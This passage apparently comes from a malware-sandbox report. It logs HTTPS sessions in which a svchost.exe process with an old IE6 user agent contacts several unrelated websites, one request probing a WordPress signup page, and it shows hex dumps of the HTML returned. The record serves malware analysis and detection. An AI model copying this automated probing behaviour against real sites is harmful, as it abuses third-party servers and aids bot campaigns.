                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2080INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2096INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2112INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2128INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        143192.168.2.662655185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2143OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2167INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:27 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2167INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        144192.168.2.66315483.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2180OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2332INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=98
                                                                                                                                                                                                                                                                        Content-Length: 48939
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:29 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2332INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2335INData Raw: 7d 72 65 74 75 72 6e 21 31 7d 28 6f 5b 72 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 2c 22 66 6c 61 67 22 21 3d 3d 6f 5b 72 5d 26 26 28 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 29 3b 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 74 2e 73 75 70 70 6f 72 74 73 2e
                                                                                                                                                                                                                                                                        Data Ascii: }return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2343INData Raw: 34 20 30 2e 38 3b 30 2e 32 20 30 2e 36 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 38 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72
                                                                                                                                                                                                                                                                        Data Ascii: 4 0.8;0.2 0.6 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(8)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2351INData Raw: 68 22 3a 22 54 79 70 65 20 74 6f 20 73 65 61 72 63 68 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6b 62 2d 73 75 70 70 6f 72 74 2f 61 73 73 65 74 73 2f 6a 73 2f 6b 62 73 2d 61 6a 61 78 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 35 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73
                                                                                                                                                                                                                                                                        Data Ascii: h":"Type to search"};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/kb-support/assets/js/kbs-ajax.min.js?ver=1.5.4'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/revs
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2359INData Raw: 72 65 6d 6f 76 65 4c 6f 61 64 69 6e 67 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 61 64 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 22 20 6c 6f 61 64 65 72 2d 72 65 6d 6f 76 65 64 22 3b 7d 2c 35 30 30 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 20 74 79 70 65 3d 22 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f
                                                                                                                                                                                                                                                                        Data Ascii: removeLoading=setTimeout(function(){load.className+=" loader-removed";},500);});</script><link rel="icon" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg" type="" sizes="16x16"/><link rel="icon" href="https://dataform.co.uk/wp-co
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2368INData Raw: 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 48 6f 6d 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 32 35 32 35 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 64 61 74 61 66 6f 72 6d 2d 6f 76 65 72 76 69 65 77 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: ass="menu-item-text"><span class="menu-text">Home</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-52525"><a href='https://dataform.co.uk/dataform-overview/' data-level='1'><span class="menu-item-text"><
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2376INData Raw: 61 63 65 28 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6e 6f 2d 6a 73 2f 2c 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 27 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3d 63 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 64 74 2d 74 68 65 37 2f 6a 73 2f 6d 61 69 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 30 2e 31 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 70 63 66 37 3d
                                                                                                                                                                                                                                                                        Data Ascii: ace(/woocommerce-no-js/,'woocommerce-js');document.body.className=c;</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/themes/dt-the7/js/main.min.js?ver=6.6.0.1'></script><script type='text/javascript'>//<![CDATA[var wpcf7=


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        145192.168.2.663503104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2229OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                        Cookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2252INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:29 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:56:28 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QZTHyxWuO1bZK2SiDXs4MtYkeX6MkPtq1MXrG%2BFZXF6lB1o%2BMNm9Zqn8wywTD%2BwCqhy6FKueKxuWybe0O6FNkoOso67KwftEzGi8M4YYGuRfi0FlWRjW2vqEChCh6qBogwr%2FGg5MMJ4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8730867994e-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2252INData Raw: 37 63 61 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                        Data Ascii: 7caf<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2253INData Raw: 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61
                                                                                                                                                                                                                                                                        Data Ascii: mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/templa
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2254INData Raw: 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74 73 74 72 61
                                                                                                                                                                                                                                                                        Data Ascii: /mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/bootstra
